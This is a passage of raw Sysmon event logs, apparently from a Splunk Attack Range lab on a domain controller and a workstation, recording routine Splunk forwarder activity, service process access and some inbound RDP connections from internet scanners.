23542300x800000000000000064983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:01.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\ClickToRun\ProductReleases\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\AABFADD6-A65C-4428-98D1-CBD3DEDD146C.stream.x64.x-none.0.datMD5=0A25E4840D9E188F9519954BD3DCFB0C,SHA256=C8B11194A840F1E385D63EA1CAD01C1826913BB85EE1D59947E28DE63329B91B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049695Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:01.717{85C0FFC9-B7EC-607E-0D00-00000000BB01}8083596C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1600-00000000BB01}1200C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049694Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:01.311{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16D7E3AC42A1966B541D319FE6D1E2A1,SHA256=A7E37158633CD2D0B8DBCC1A8A967AD4ABE05DEEB4AFC93A5903993144FA9EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049693Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:01.123{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D24A81975A6D102E662F4B1A1611FEC,SHA256=DF2B4EF14203D18FE89AFB9B53E8E71CA2FEDF6D129EC62FF2140A9EF630B823,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000065001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:01.197{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57498-false10.0.1.12-8000- 23542300x800000000000000065000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.674{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8CA42618790C6B9B9DC243E7C9EF14,SHA256=FFA41C2ECF87FBEF5DE9D7FDFB74AB1EA9B6EBE74731D0B1938DE95301711C1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000064999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.517{A7A01FEF-EB46-607E-7A0B-00000000BB01}28887088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000064998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\ClickToRun\ProductReleases\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\938C817C-B832-4091-BCAC-7EAAF6891D5D.stream.x64.en-us.0.datMD5=F9AF00DC1FE5E8C2FB68C620DCB998FA,SHA256=2BF9969EA344C0104E4B03750EC5F64A2B6A33A9EDF69C17A54D05BEA23B29AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000064997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB46-607E-7A0B-00000000BB01}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB46-607E-7A0B-00000000BB01}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000064991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.361{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB46-607E-7A0B-00000000BB01}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000064990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.362{A7A01FEF-EB46-607E-7A0B-00000000BB01}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000064989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:02.346{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1C6E770C32FE6C672F92E702EC38E70,SHA256=DC407ECE5E971D774E283AF25422FF0563CB206C48B5563E1BE00E88D0A818AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049699Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.736{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60035-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049698Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:00.011{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51488-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049697Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:02.686{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF81173A49D6A8F777BC9AD8D5049059,SHA256=3B97140D02F89786E55AE823FBDF28A05E5337F5785B22098D37EF32E619E3C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049696Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:02.170{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD0C7A0A3B8E7FFD75DBD185EE7FBAC,SHA256=393DA6951EB2C6627FF06DD14EB633FCC545653E5039205A60A460460EF8FB1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000065022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.908{A7A01FEF-EB47-607E-7C0B-00000000BB01}11566548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000065021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:01.661{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14021-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000065020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB47-607E-7C0B-00000000BB01}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB47-607E-7C0B-00000000BB01}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000065014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB47-607E-7C0B-00000000BB01}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000065013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.752{A7A01FEF-EB47-607E-7C0B-00000000BB01}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000065012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.689{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2004B36933B1A1C1418503A2BD2C52D0,SHA256=2347B85F868C364D2D0CD6CF73E62A610B7883CA9505C1EF03C1ED54A1667A0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.408{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=143956773EF87BA63520C60696FBCA46,SHA256=7ED633E59537EE8AF80A43B0FC06B5FC266BA19FED604C288E3674AC80E1B369,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000065010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.252{A7A01FEF-EB47-607E-7B0B-00000000BB01}58124560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.080{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB47-607E-7B0B-00000000BB01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.080{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 